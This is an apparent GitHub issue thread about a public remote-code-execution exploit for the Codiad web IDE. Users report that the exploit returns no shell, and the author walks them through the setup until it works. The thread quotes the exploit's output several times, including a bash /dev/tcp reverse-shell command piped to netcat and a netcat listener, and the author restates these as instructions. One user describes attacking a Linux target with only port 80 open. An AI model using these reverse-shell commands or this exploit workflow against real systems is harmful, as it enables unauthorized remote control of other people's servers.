Closed gazcbm closed 6 years ago
please provide more details
Sent from my iPhone
On Aug 11, 2018, at 5:35 AM, GAZCBM notifications@github.com wrote:
Running the script and I get the following (with no reverse shell) .... [+] Please execute the following command on your vps: echo 'bash -c "bash -i >/dev/tcp/192.168.1.2/4445 0>&1 2>&1"' | nc -lnvp 4444 nc -lnvp 4445 [+] Please confirm that you have done the two command above [y/n] [Y/n] y [+] Starting... [+] Login Content : {"status":"success","data":{"username":"admin"}} [+] Login success! [+] Getting writeable path... [+] Path Content : {"status":"success","data":{"name":"test","path":"files"}} [+] Writeable Path : files [+] Sending payload... {"status":"error","message":"No Results Returned"} [+] Exploit finished! [+] Enjoy your reverse shell!
— You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub, or mute the thread.
Hi Wang. I am also having a similar issue as gazcbm. The exploit is not returning shell for some reason. I tried it out on 2.53 and 2.84 both. I am exploiting a Linux system with a single open port, 80.
got it, I will check it out tonight. Thank you guys for reporting
On Sat, Aug 18, 2018 at 4:26 PM A3iodun notifications@github.com wrote:
Hi Wang. I am also having a similar issue as gazcbm. The exploit is not returning shell for some reason. I tried it out on 2.53 and 2.84 both. I am exploiting a Linux system with a single open port, 80.
— You are receiving this because you commented.
Reply to this email directly, view it on GitHub https://github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit/issues/5#issuecomment-414041463, or mute the thread https://github.com/notifications/unsubscribe-auth/AQIkhGslg_yAgxyVfRXqNhH3G17QVhZzks5uR8-agaJpZM4V42EQ .
Have you followed the instructions: On Linux machine you should open two terminal and execute two commands
On Sat, Aug 18, 2018 at 9:14 PM 王一航 wangyihanger@gmail.com wrote:
got it, I will check it out tonight. Thank you guys for reporting
On Sat, Aug 18, 2018 at 4:26 PM A3iodun notifications@github.com wrote:
Hi Wang. I am also having a similar issue as gazcbm. The exploit is not returning shell for some reason. I tried it out on 2.53 and 2.84 both. I am exploiting a Linux system with a single open port, 80.
— You are receiving this because you commented.
Reply to this email directly, view it on GitHub https://github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit/issues/5#issuecomment-414041463, or mute the thread https://github.com/notifications/unsubscribe-auth/AQIkhGslg_yAgxyVfRXqNhH3G17QVhZzks5uR8-agaJpZM4V42EQ .
Like this echo 'bash -c "bash -i >/dev/tcp/192.168.1.2/4445 0>&1 2>&1"' | nc -lnvp 4444 nc -lnvp 4445
On Sat, Aug 18, 2018 at 9:17 PM 王一航 wangyihanger@gmail.com wrote:
Have you followed the instructions: On Linux machine you should open two terminal and execute two commands
- echo 'evil command to pop up a reverse shell to port 5555' | nc -nlvp 4444
- nc -nvlp 5555 You will get shell on the second terminal
On Sat, Aug 18, 2018 at 9:14 PM 王一航 wangyihanger@gmail.com wrote:
got it, I will check it out tonight. Thank you guys for reporting
On Sat, Aug 18, 2018 at 4:26 PM A3iodun notifications@github.com wrote:
Hi Wang. I am also having a similar issue as gazcbm. The exploit is not returning shell for some reason. I tried it out on 2.53 and 2.84 both. I am exploiting a Linux system with a single open port, 80.
— You are receiving this because you commented.
Reply to this email directly, view it on GitHub https://github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit/issues/5#issuecomment-414041463, or mute the thread https://github.com/notifications/unsubscribe-auth/AQIkhGslg_yAgxyVfRXqNhH3G17QVhZzks5uR8-agaJpZM4V42EQ .
@gazcbm @A3iodun I tested the exploit again, works fine, I made a screen record, you guys can just follow these two videos:
Works just fine now. Thank you.
Running the script and I get the following (with no reverse shell) .... [+] Please execute the following command on your vps: echo 'bash -c "bash -i >/dev/tcp/192.168.1.2/4445 0>&1 2>&1"' | nc -lnvp 4444 nc -lnvp 4445 [+] Please confirm that you have done the two command above [y/n] [Y/n] y [+] Starting... [+] Login Content : {"status":"success","data":{"username":"admin"}} [+] Login success! [+] Getting writeable path... [+] Path Content : {"status":"success","data":{"name":"test","path":"files"}} [+] Writeable Path : files [+] Sending payload... {"status":"error","message":"No Results Returned"} [+] Exploit finished! [+] Enjoy your reverse shell!